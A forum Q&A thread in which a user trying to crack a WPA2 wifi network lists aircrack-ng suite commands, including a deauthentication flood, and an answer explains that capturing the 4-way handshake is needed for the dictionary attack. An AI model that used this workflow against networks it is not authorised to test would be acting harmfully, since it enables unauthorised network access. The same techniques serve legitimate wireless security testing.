# (Got no data packets from target network!) error in aircrack-ng ubuntu

Tags: networking, wireless, network-manager, aircrack-ng, hacking

I try to hack WPA2 wifi so this is what i do:

```
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng --bssid (bssid) -c (channel) --write wpa2 wlan0mon
aireplay-ng --deauth 100 -a (bssid) wlan0mon
```

but when i try the `aircrack-ng wpa2.cap -w passlist.txt` it does`t work and this is the error:

> Opening WPA2-01.cap Read 12126 packets.
>
> #  BSSID              ESSID                     Encryption
>
> 1  BC:F6:85:DE:2A:A5  Dr.laban                  No data - WEP or
>   WPA
>
> Choosing first network as target.
>
> Opening WPA2-01.cap Got no data packets from target network!
>
> Quitting aircrack-ng...

i also try `service network-manager stop` and `airmon-ng check kill` but it does`t work.

Comment: try using `aireplay-ng -c (channel) -b (bssid) -h (mac) wlan0mon` after run airodump-ng --write and run `aircrack-ng -c (channel) wpa2 -O WPA2-01.cap`

Answer (score 0, accepted):

The output of the `aircrack-ng` states

> No data - WEP or WPA

this means that all the captured packets are just beacons (AP announcement packets) and no real useful AP-client data was captured.

Moreover, not all the AP-client data can be used for WPA2 cracking, just the 4-way **handshakes**.

You just have to do a successful access to the WPA2 network with another device while capturing with `airodump-ng` and a

> WPA handshake: aa:bb:cc:dd:ee:ff

will appear confirming the acquisition of the useful data.

Comment: you mean i have to do a lot of handshakes that finally found something useful?

Comment: One handshake should be enough :)